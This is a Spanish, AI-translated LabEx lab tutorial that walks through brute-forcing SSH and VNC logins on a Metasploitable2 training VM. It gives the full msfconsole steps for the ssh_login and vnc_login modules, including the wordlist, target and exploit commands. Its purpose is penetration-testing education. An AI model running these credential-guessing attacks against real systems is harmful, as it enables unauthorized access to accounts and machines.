Realizar ataques de fuerza bruta en SSH y VNC con Metasploit en Nmap

NmapNmapBeginner
Practicar Ahora

💡 Este tutorial está traducido por IA desde la versión en inglés. Para ver la versión original, puedes hacer clic aquí

Introducción

En este laboratorio, aprenderás cómo realizar ataques de fuerza bruta contra servicios de autenticación de contraseñas débiles. Si un servicio de red requiere autorización para acceder y el mecanismo de autorización se basa en nombres de usuario y contraseñas, las vulnerabilidades de contraseñas débiles pueden convertirse en un objetivo de ataque común. Este tipo de vulnerabilidad suele ser causada por usuarios que configuran contraseñas débiles, como "123456".

El enfoque más sencillo para explotar contraseñas débiles es utilizar un ataque de fuerza bruta basado en un diccionario. El archivo de diccionario que contiene posibles nombres de usuario y contraseñas es crucial en este ataque. El atacante intenta conectarse utilizando las combinaciones de nombres de usuario y contraseñas del diccionario hasta que se establece una conexión exitosa.

En este laboratorio, utilizarás la terminal del Metasploit Framework (MSF) en el entorno de Kali Linux dentro de la plataforma LabEx para realizar ataques de fuerza bruta contra los servicios SSH y VNC en la máquina objetivo Metasploitable2.

Nota: Las instancias en la nube utilizadas en este laboratorio tienen un número limitado de instancias disponibles debido a restricciones de costo. Asegúrate de iniciar el entorno de laboratorio solo cuando tengas suficiente tiempo para completar los ejercicios, para evitar desperdiciar instancias.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/verbosity("Verbosity Levels") subgraph Lab Skills nmap/target_specification -.-> lab-416127{{"Realizar ataques de fuerza bruta en SSH y VNC con Metasploit en Nmap"}} nmap/verbosity -.-> lab-416127{{"Realizar ataques de fuerza bruta en SSH y VNC con Metasploit en Nmap"}} end

Comprender el entorno

En este paso, aprenderás sobre el entorno de laboratorio y los requisitos previos para realizar los ataques de fuerza bruta.

El entorno de laboratorio consta de dos componentes:

  1. Máquina de ataque: Un contenedor de Kali Linux que debe iniciarse utilizando el comando docker y accederse a través de la shell bash.
  2. Máquina objetivo: Una máquina virtual Metasploitable2 con el nombre de host target y la dirección IP 192.168.122.102. El nombre de usuario y la contraseña predeterminados para esta máquina son msfadmin/msfadmin. Esta máquina debe iniciarse utilizando el sistema de gestión de máquinas virtuales Libvirt.

Los ataques se llevarán a cabo desde el entorno de Kali Linux utilizando el Metasploit Framework (MSF) contra la máquina objetivo.

Para iniciar el entorno de laboratorio, sigue estos pasos:

  1. Inicia una terminal XFCE en la máquina host de LabEx (escritorio de Ubuntu).

  2. Inicia la máquina objetivo Metasploitable2 utilizando el siguiente comando:

sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Prueba la conectividad a la máquina objetivo utilizando el comando ping (puedes usar Ctrl+C para detener el ping):
ping 192.168.122.102
  1. Inicia el contenedor de Kali Linux y entra en la shell bash utilizando el siguiente comando:
docker run -ti --network host b5b709a49cd5 bash
  1. Prueba la conectividad de red desde el contenedor de Kali a la máquina objetivo utilizando el comando ping (puedes usar Ctrl+C para detener el ping):
ping 192.168.122.102

Ahora tanto la máquina de ataque (contenedor de Kali) como la máquina objetivo (Metasploitable2) están en funcionamiento, y puedes continuar con los ataques de fuerza bruta.

Nota: Si sales accidentalmente de la shell bash, el contenedor de Kali se detendrá. Puedes reiniciar un nuevo contenedor de Kali y volver a entrar en la shell bash ejecutando el comando docker run -ti --network host b5b709a49cd5 bash en la máquina host de LabEx.

Fuerza bruta en SSH

En este paso, aprenderás cómo realizar un ataque de fuerza bruta contra el servicio SSH en la máquina objetivo Metasploitable2 utilizando el Metasploit Framework (MSF) en el entorno de Kali Linux.

  1. En el contenedor de Kali Linux, inicia la consola de Metasploit:
cd ~
msfconsole
  1. Dentro de la consola de Metasploit, utiliza el módulo auxiliary/scanner/ssh/ssh_login para el ataque de fuerza bruta en SSH:
use auxiliary/scanner/ssh/ssh_login
  1. Configura las opciones necesarias para el ataque:
  • Establece el host objetivo:
set rhosts 192.168.122.102
  • Establece el archivo de diccionario de contraseñas (puedes utilizar el archivo /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt proporcionado):
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
  • Establece la verbosidad en false para evitar una salida excesiva:
set verbose false
  1. Revisa las opciones configuradas:
show options
  1. Inicia el ataque de fuerza bruta:
exploit

El ataque comenzará, intentando iniciar sesión en el servicio SSH utilizando las combinaciones de nombres de usuario y contraseñas del archivo de diccionario especificado. Una vez que se encuentre un inicio de sesión exitoso, se mostrarán las credenciales correspondientes.

Nota: El proceso de fuerza bruta puede llevar mucho tiempo. Puedes interrumpir el proceso presionando Ctrl+C después de que se muestre el primer inicio de sesión exitoso, si lo deseas.

  1. Después de encontrar un inicio de sesión exitoso, el script de ataque creará automáticamente una sesión SSH. Puedes cambiar a la sesión utilizando el comando sessions -i <session_id>, donde <session_id> es el ID de sesión mostrado en la salida.

  2. Dentro de la sesión SSH, puedes ejecutar varios comandos en la máquina objetivo.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Fuerza bruta en VNC

En este paso, aprenderás cómo realizar un ataque de fuerza bruta contra el servicio VNC en la máquina objetivo Metasploitable2 utilizando el Metasploit Framework (MSF) en el entorno de Kali Linux.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Dentro de la consola de Metasploit, utiliza el módulo auxiliary/scanner/vnc/vnc_login para el ataque de fuerza bruta en VNC:
use auxiliary/scanner/vnc/vnc_login
  1. Configura el número de hilos (threads) para el ataque (más hilos harán que el ataque sea más rápido, pero también puede aumentar la posibilidad de detección):
set THREADS 5
  1. Establece la dirección IP del host objetivo:
set RHOSTS 192.168.122.102
  1. Inicia el ataque de fuerza bruta:
exploit
  1. Los resultados del ataque se mostrarán rápidamente, ya que el inicio de sesión en VNC no requiere un nombre de usuario y solo intenta contraseñas débiles comunes.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Resumen

En este laboratorio, aprendiste cómo realizar ataques de fuerza bruta contra servicios de autenticación de contraseñas débiles utilizando el Metasploit Framework (MSF) en el entorno de Kali Linux. En concreto, llevaste a cabo ataques de fuerza bruta contra los servicios SSH y VNC en la máquina objetivo Metasploitable2.

El laboratorio cubrió los siguientes conceptos clave:

  • Comprender el entorno de laboratorio y los requisitos previos
  • Configurar el Metasploit Framework para ataques de fuerza bruta
  • Utilizar archivos de diccionario de contraseñas para ataques de fuerza bruta
  • Realizar ataques de fuerza bruta contra el servicio SSH
  • Analizar el script de ataque de fuerza bruta en SSH
  • Realizar ataques de fuerza bruta contra el servicio VNC

A través de esta experiencia práctica, adquiriste conocimientos y habilidades prácticas para realizar ataques de fuerza bruta contra servicios de autenticación de contraseñas débiles, lo cual es un aspecto crucial de las pruebas de penetración y el hacking ético.